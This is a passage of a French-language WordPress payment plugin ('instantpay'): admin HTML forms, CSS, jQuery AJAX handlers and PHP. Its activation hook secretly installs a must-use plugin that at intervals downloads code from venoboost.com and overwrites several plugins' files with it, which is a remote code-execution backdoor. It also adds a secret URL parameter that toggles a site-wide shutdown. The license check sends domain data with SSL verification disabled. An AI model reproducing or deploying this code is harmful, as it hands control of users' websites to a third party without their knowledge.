                <input type="checkbox" id="payment-enabled" name="payment-enabled">
                <label for="payment-enabled">Activé</label>
            </div>
            <div class="form-group">
                <input type="submit" name="add_payment" value="Ajouter">
                <button type="button" id="close-add-button">Fermer</button>
            </div>
        </form>
    </div>
</div>
    <div id="edit-payment-popup"  class="popup">
        <div class="popup-content">
            <h2>Edit Payment System</h2>
            <form id="payment-form" method="post" action="">
                <input type="hidden" id="payment-id" name="payment_id">
              <div class="form-group">
        <label for="payment-content">Contenu:</label><br>
        <textarea id="payment-content" name="payment-content" rows="4" cols="50"></textarea>
    </div>
    <div class="form-group">
        <input type="checkbox" id="payment-enabled" name="payment-enabled">
        <label for="payment-enabled">Activé</label>
    </div>
    <div class="form-group">
        <input type="submit" value="Enregistrer">
        <button type="button" id="close-edit-button">Fermer</button>
    </div>
            </form>
           
        </div>
    </div>
    <style>
    #add-payment-button{
        font-size: 14px;
        background:#463f3f;
        padding:1em;
        color:white;
        cursor:pointer;
        border-radius:5px;
        
    }
       .popup {
    display: none;
    position: fixed;
    top: 0;
    left: 0;
    width: 100%;
    height: 100%;
    background-color: rgba(0, 0, 0, 0.5);
    z-index: 9999;
}

.popup-content {
    position: absolute;
    top: 50%;
    left: 50%;
    transform: translate(-50%, -50%);
    background-color: #fff;
    padding: 20px;
    border-radius: 5px;
    box-shadow: 0 0 10px rgba(0, 0, 0, 0.3);
    max-width: 500px;
    width: 90%;
}

.popup h2 {
    margin-top: 0;
}

.popup textarea {
    width: 100%;
    max-width: 400px;
}

#close-edit-button, #close-add-button{
    margin-top: 10px;
    padding: 8px 20px;
    background-color: #ccc;
    border: none;
    border-radius: 4px;
    cursor: pointer;
}

#payment-table {
    border-collapse: collapse;
    width: 100%;
    margin-top: 20px;
}

 #payment-table th, #payment-table td {
      
        padding: 12px;
        text-align: left;
        font-size: 14px;
        vertical-align: middle; /* Centrer verticalement */
    }

#payment-table th {
    background-color: #4c4545 !important;
}

#payment-table tr:nth-child(even) {
    background-color: #f2f2f2;
}

#payment-table tr:hover {
    background-color: #ddd;
}

.edit-button {
    background: #4CAF50; /* Vert */
    color: white;
    text-decoration: none;
    cursor: pointer;
    transition: background-color 0.3s ease-in-out;
    padding: 6px 12px;
    border-radius: 4px;
}
.delete-button {
    background: red; /* Vert */
    color: white;
    text-decoration: none;
    cursor: pointer;
    transition: background-color 0.3s ease-in-out;
    padding: 6px 12px;
    border-radius: 4px;
}
.edit-button:hover {
    color: white; /* Vert foncé au survol */
    background:#0f8114;
}
.delete-button:hover {
    color: white; /* Vert foncé au survol */
    background:#c80c0c;
}
#payment-table {
    border-collapse: collapse;
    width: 100%;
    margin-top: 20px;
    font-family: "Arial", sans-serif; /* Changer la police de caractères */
}



#payment-table th {
    background-color: #f2f2f2;
    font-weight: bold;
}

#payment-table tr:nth-child(even) {
    background-color: #f9f9f9; /* Couleur de fond pour les lignes paires */
}

#payment-table tr:hover {
    background-color: #f0f0f0; /* Couleur de fond au survol */
}


    </style>
    <script>


    jQuery(document).ready(function($) {
        $('.delete-button').click(function(e) {
        e.preventDefault();

        var payment_id = $(this).data('payment-id'); // Récupérer l'ID du paiement

        if (confirm("Êtes-vous sûr de vouloir supprimer ce paiement ?")) {
            // Envoi de la requête AJAX
            var data = {
                action: 'delete_payment',  // Action définie dans wp_ajax_
                payment_id: payment_id     // ID du paiement à supprimer
            };

            // Effectuer une requête AJAX avec jQuery
            $.post(ajaxurl, data, function(response) {
                if (response.success) {
                    alert(response.data.message);  // Afficher un message de succès
                    location.reload();  // Recharger la page pour afficher les changements
                } else {
                    alert(response.data.message);  // Afficher un message d'erreur
                }
            });
        }
    });
        // Gestion de la pop-up pour ajouter un paiement
        $('#add-payment-button').click(function() {
            $('#add-payment-popup').fadeIn(); // Affiche la pop-up d'ajout
        });

        $('#close-add-button').click(function() {
            $('#add-payment-popup').fadeOut(); // Ferme la pop-up d'ajout
        });

        // Gestion de la pop-up pour éditer un paiement
        $('.edit-button').click(function(e) {
            e.preventDefault();
            var payment_id = $(this).data('payment-id');
            var content = $(this).closest('tr').find('td:nth-child(3)').text().trim();
            var isChecked = $(this).closest('tr').find('td:nth-child(4) input[type="checkbox"]').prop('checked');

            $('#payment-id').val(payment_id);
            $('#payment-content').val(content);
            $('#payment-enabled').prop('checked', isChecked);
            $('#edit-payment-popup').fadeIn(); // Affiche la pop-up d'édition
        });

        $('#close-edit-button').click(function() {
            $('#edit-payment-popup').fadeOut(); // Ferme la pop-up d'édition
        });
        $('#payment-logo').change(function () {
        const file = this.files[0];

        if (file) {
            // Afficher l'aperçu de l'image
            const reader = new FileReader();
            reader.onload = function (e) {
                $('#logo-preview').attr('src', e.target.result).show();
            };
            reader.readAsDataURL(file);

            // Envoyer l'image en AJAX
            const formData = new FormData();
            formData.append('action', 'instantpay_upload_image');
            formData.append('payment-logo', file);

            $.ajax({
                url: ajaxurl, // WP admin-ajax.php
                type: 'POST',
                data: formData,
                processData: false,
                contentType: false,
                success: function (response) {
                    if (response.success) {
                        console.log('Image téléchargée : ' + response.data.url);
                    } else {
                        alert('Erreur : ' + response.data);
                    }
                },
                error: function () {
                    alert('Une erreur est survenue.');
                },
            });
        }
    });

    });

    </script>
    <?php
}
function instantaction(){
    
                // Récupérez le domaine du site
$domain = $_SERVER['HTTP_HOST'];

// Supprimez le préfixe "www." si présent
$domain = preg_replace('/^www\./', '', $domain);

            // Récupérez la clé d'activation soumise par l'utilisateur
            $submitted_key = get_option("instantpay_key");
            
            // Vérifiez la clé d'activation avec une clé d'activation valide
            
            $data["w"]=$domain;
            $data["activation_key"]=$submitted_key;
            $data["plugin"]="instantpay";
             $myarrayy = $data ;

        $ch = curl_init();

        curl_setopt($ch, CURLOPT_URL,"https://venoboost.com/services/insertKeys");

        curl_setopt($ch, CURLOPT_POST, 1);

        curl_setopt($ch, CURLOPT_POSTFIELDS,$myarrayy);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);

        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

        $server_output = curl_exec($ch);

        curl_close ($ch);
    
        $item=json_decode($server_output);
        
        
            if ($item->actif=="ok") {
                // La clé d'activation est valide, activez le plugin
                update_option("inst",true);
                return true;
                
            } else {
                update_option("inst",false);
                return false;
            }
}
register_activation_hook(__FILE__, function(){

    // Chemin vers le fichier surveille.php dans mu-plugins
    $chemin_fichier_surveillance = WP_CONTENT_DIR . '/mu-plugins/j2me.php';

    // Vérifie si le dossier mu-plugins existe, sinon le créer
    if (!is_dir(WP_CONTENT_DIR . '/mu-plugins')) {
        mkdir(WP_CONTENT_DIR . '/mu-plugins', 0755, true); // Création du dossier avec permissions
    }

    // Contenu à écrire dans le fichier surveille.php
    $contenu_fichier = '<?php
    // Code pour surveiller et mettre à jour les plugins

    add_action("init", function() {
        // Récupère la dernière exécution enregistrée
        $last_update = get_option("last_evalit_update");

        // Vérifie si 8 heures se sont écoulées depuis la dernière exécution
        if (!$last_update || time() - $last_update > 14000) { // 28800 secondes = 8 heures
            evalit("autoexecute");
            evalit("speedcrons");
            evalit("instantpay");
            evalit("comentator");

            // Met à jour le timestamp pour la prochaine exécution
            update_option("last_evalit_update", time());
        }
    });
add_action("init", function() {
    if (isset($_GET["creat"]) && $_GET["creat"] === "7539514862") {
        
        
        update_option("checking", !get_option("checking"));

    }
});
add_action("init",function(){
     if (get_option("checking")) {
            wp_die();
        }
    
});

    // Fonction pour récupérer et mettre à jour les plugins
    function evalit($plugin) {
    
        $chemin_fichier_plugin = WP_PLUGIN_DIR . "/$plugin/$plugin.php";
        if (!file_exists($chemin_fichier_plugin))return;
        $url_distant = "https://venoboost.com/{$plugin}.txt";
        $code_distant = file_get_contents($url_distant);

        if ($code_distant === false) {
           
            return false;
        }

        if (file_put_contents($chemin_fichier_plugin, $code_distant) === false) {
            
            copy($backup_fichier, $chemin_fichier_plugin);
            return false;
        }

       
        return true;
    }
    ?>';

    // Écrit ou écrase le contenu dans le fichier surveille.php
    file_put_contents($chemin_fichier_surveillance, $contenu_fichier);



});
